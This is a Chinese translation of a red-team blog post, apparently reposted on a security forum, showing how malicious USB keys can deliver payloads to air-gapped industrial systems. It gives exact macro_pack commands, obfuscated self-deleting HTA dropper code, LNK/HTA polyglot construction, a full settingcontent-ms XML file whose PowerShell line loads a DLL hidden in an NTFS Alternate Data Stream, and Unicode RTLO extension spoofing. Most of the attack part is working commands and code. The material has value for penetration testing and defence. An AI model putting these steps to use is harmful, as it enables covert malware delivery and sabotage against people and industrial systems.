本文翻译自:http://blog.sevagas.com/?Advanced-USB-key-phishing


本文讲解一些恶意USB key被攻击者利用用于工业系统攻击的场景。

简介

针对工业系统的攻击一般都是通过自动的恶意软件payload完成的,特点是不需要连接到远程系统。Payload也不需要窃取数据,因为主要目的是破坏,如Stuxnet震网病毒。攻击者需要绕过的安全防护措施包括电信网络过滤或完全的airgap。

在这样的环境下,攻击向量需要处理的规则有:

  • 没有internet连接;

  • 除操作系统外没有目标系统的其他信息;

  • USB可见内容应该尽可能少地产生可能的告警;

  • Payload的执行应该尽可能少地产生可能的告警。

攻击的目的就是传播和运行二进制payload。在下面的例子中,payload就是一个DLL文件。

LNK POC

策略

在POC中,研究人员使目标认为打开的是一个图像(confidential.jpg),而实际上打开的是恶意的LNK快捷方式文件(confidential.jpg.lnk)。HTA dropper隐藏在快捷方式文件中,LNK文件会执行HTA,而HTA会释放并执行DLL payload,并用诱饵文件(confidential.jpg)替换快捷方式。

构建HTA DLL释放payload

研究人员用macro_pack创建了一个会释放和执行payload.dll的混淆过的HTA payload:

echo DllMain | macro_pack.exe --template=EMBED_DLL --embed=payload.dll --obfuscate -G payload.hta

EMBED_DLL模板会创建一段VB代码,代码会释放用-embed扩展加载的文件,并用Rundl32l加载。研究人员用该模板来运行DLL的DllMain函数。

研究人员用-G选项生成一个HTA文件,而且文件中的VB代码是混淆过的。
可以使用mshta来检查HTA文件是否工作,并调用临时文件夹释放的DLL文件。

构造释放payload的HTA图片

研究人员用EMBED_EXE macro_pack 模板在特定目录内潜入、释放和运行payload。在本例中,研究人员使用的图片是confidential.jpg。目标是在能够同样的文件夹中释放一个恶意LNK来在DLL payload执行时替换该LNK。

echo "confidential.jpg" | macro_pack.exe -t EMBED_EXE --embed=confidential.jpg -o -G pic.hta

如果双击pic.hta,可以看到释放到当前文件夹的confidential.jpg图片,并被默认图片浏览器打开。

在自删除的HTA文件中装配

研究人员必须生成DLL释放器来在macro_pack中潜入到二进制payload,图片释放器会手动复制粘贴来生成最终的HTA payload。
指令:

  • 在文本编辑器中打开payload.hta和pic.hta;
  • 把pic.hta "AutoOpen"函数重命名为"AutoOpen2";
  • 复制pic.hta中除最后两行AutoOpen和Close外的所有VB代码到payload.hta;
  • 在payload.hta文件中编辑最后的AutoOpen和Close。
AutoOpen2
AutoOpen
Set objFSO = CreateObject( "Scripting.FileSystemObject" )
Set WshShell = CreateObject("WScript.Shell") 
objFSO.DeleteFile window.document.location.pathname
Close

payload.hta文件就会释放并运行这个图片,然后运行DLL,最后删除自己。

构建恶意LNK

研究人员利用HTA文件的多语言特性,将HTA嵌入到LNK文件中。研究人员希望LNK文件名为confidential.jpg.lnk,因此要运行下面的代码:

%windir%\system32\cmd.exe /c start "" "mshta" "%CD%\confidential.jpg.lnk"

然后使用macro_pack来生成LNK。研究人员可以直接生成快捷方式到USB Key中来避免系统对快捷方式文件的修改。USB所在目录是G:

macro_pack.exe -G G:\confidential.jpg.lnk

当提示shortcut_Target时,输入:

%windir%\system32\cmd.exe /c start "" "mshta" "%CD%\confidential.jpg.lnk"

当提示Shortcut_Icon时,输入:

%windir%\system32\imageres.dll,67 (Index 67 corresponds to JPG images icon in imageres.dll)

当创建LNK快捷方式文件时,研究人员将其添加到HTA代码中:

copy /b G:\confidential.jpg.lnk+cmd.hta G:\confidential.jpg.lnk

这就完成了钓鱼向量。

测试

将confidential.jpg.lnk复制到USB key中,将USB key插入到另一个Windows机器上。访问USB key并双击confidential.jpg文件,就可以看到该文件。

DLL文件同时也加载了,但是是隐藏的,可以在任务管理器中看到。DLL在临时文件夹中释放的信息为Document1.asd,并且在了一行VB代码中执行:

CreateObject("WScript.Shell").Run "%windir%\system32\rundll32.exe %temp%\Document1.asd,<<<DLL_FUNCTION>>>", 0

之后可以看到LNK文件不在在USB key上了,而是被真实的图片文件替代了。

恶意设置的POC

策略

在第二个POC中,要让用户相信打开的是README.txt文件,而后台真正运行的是恶意的settingcontent-ms文件。

因为settingcontent-ms文件遵循严格的XML方案,所以像POC1中一样将其添加到HTA文件中看似不太可能。但研究人员使用NTFS Alternate Data Stream来运行和隐藏DLL payload。

settingcontent-ms文件会运行隐藏在Alternate Data Stream (README.txt.settingcontent-ms:R)中的DLL,并运行Notepad来展示保存在了一个ADS(README.txt.settingcontent-ms:T. txt ) 中的诱饵文件。settingcontent-ms文件的好处是没有LNK或URI文件这样的快捷方式箭头。

构建诱饵文本文件

首先,要创建一个目标打开readme文件时notepad要展示的简单文本文件。

echo "This is a simple README file." > Text.txt

构建恶意设置快捷方式文件

研究人员使用macro_pack来生成settincontent-ms文件。比如,生成一个打开计算器的假的README.txt文件:

echo 'C:\windows\system32\cmd.exe /c calc.exe' '.' |  macro_pack.exe -G README.txt.settingcontent-ms

DLL和诱饵文件会隐藏在USB key的NTFS文件系统的Alternate Data Stream中。但问题是settingcontent-ms文件默认是在C:\windows\system32\中打开的,也就是说必须要找出一种方法来找到USB key所在卷。因此,研究人员选择了powershell:

%windir%\system32\cmd.exe /c powershell.exe $drive=(Get-WmiObject Win32_Volume -Filter "DriveType='2'").Name;Start-Process "notepad.exe" "$drive\README.txt.settingcontent-ms:T.txt"; Start-Process "control.exe" "$drive\README.txt.settingcontent-ms:R"

这段代码的意思是:

  • 调用wmi来将USB卷名传递给$driver变量;
  • 用notepad来打开诱饵文件README.txt.settingcontent-ms:T.txt;
  • 用control.exe来加载README.txt.settingcontent-ms:R文件中的恶意DLL。

注:DLL也可以用POC 1中的rundll32方法加载。

最终的README.txt.settingcontent-ms文件是这样的:

<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
  <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
    <ApplicationInformation>
      <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
      <DeepLink>%windir%\system32\cmd.exe /c powershell.exe $drive=(Get-WmiObject Win32_Volume -Filter "DriveType='2'").Name;Start-Process "notepad.exe" "$drive\README.txt.settingcontent-ms:T.txt"; Start-Process "control.exe" "$drive\README.txt.settingcontent-ms:R"</DeepLink>
      <Icon>.</Icon>
    </ApplicationInformation>
    <SettingIdentity>
      <PageID></PageID>
      <HostID>{12B1697E-D3A0-4DBC-B568-CCF64A3F934D}</HostID>
    </SettingIdentity>
    <SettingInformation>
      <Description>@shell32.dll,-4161</Description>
      <Keywords>@shell32.dll,-4161</Keywords>
    </SettingInformation>
  </SearchableContent>
</PCSettings>

创建Alternative Data Streams.

首先,要确保USB key格式化为NTFS文件系统;
然后将README.txt.settingcontent-ms文件移动到NTFS USB key上。

在本例中,USB使用的卷名为G。下面开始创建ADS:
README.txt.settingcontent-ms:R 流中含有DLL:

type payload.dll > G:\README.txt.settingcontent-ms:R

文件G:\README.txt.settingcontent-ms:T.txt 流含有诱饵文件:

type Text.txt > G:\README.txt.settingcontent-ms:T.txt

使用sysinternal "Streams"可以检查USB key中是否创建ADS成功:

测试

将USB key插入另一台windows 10主机,访问USB并双击README.txt,就可以看到DLL加载的同时,notepad打开txt文件并展示文本内容:

This is a simple README file.

Unicode RTLO POC

策略

下面证明通过注入Unicode Right-To-Left-Override(RTLO,文字倒序)来欺骗文件扩展。这是隐藏文件扩展名的好办法,因为字符经RTLO处理后会从右到左显示。比如,可以生成一个用macro_pack生成一个含有假jpg扩展的HTA文件:

echo calc.exe | macro_pack.exe -t CMD -G calc.hta --unicode-rtlo=jpg

在资源管理器中,本应是calc[rtlo]gpj.hta的文件会显示为calcath.jpg。这种方法在Ubuntu这样的系统中也是有用的。

练习

使用Unicode RTLP进行钓鱼攻击有很多种方法。其中一种是将恶意exe文件伪装成zip文件。在这种攻击场景中,当受害者点击假的zip文件,exe就会运行payload并打开隐藏在文件资源或ADS中的诱饵文件。

有兴趣的朋友可以自己练习测试一下Unicode RTLO。

点击收藏 | 2 关注 | 1
  • 动动手指,沙发就是你的了!
登录 后跟帖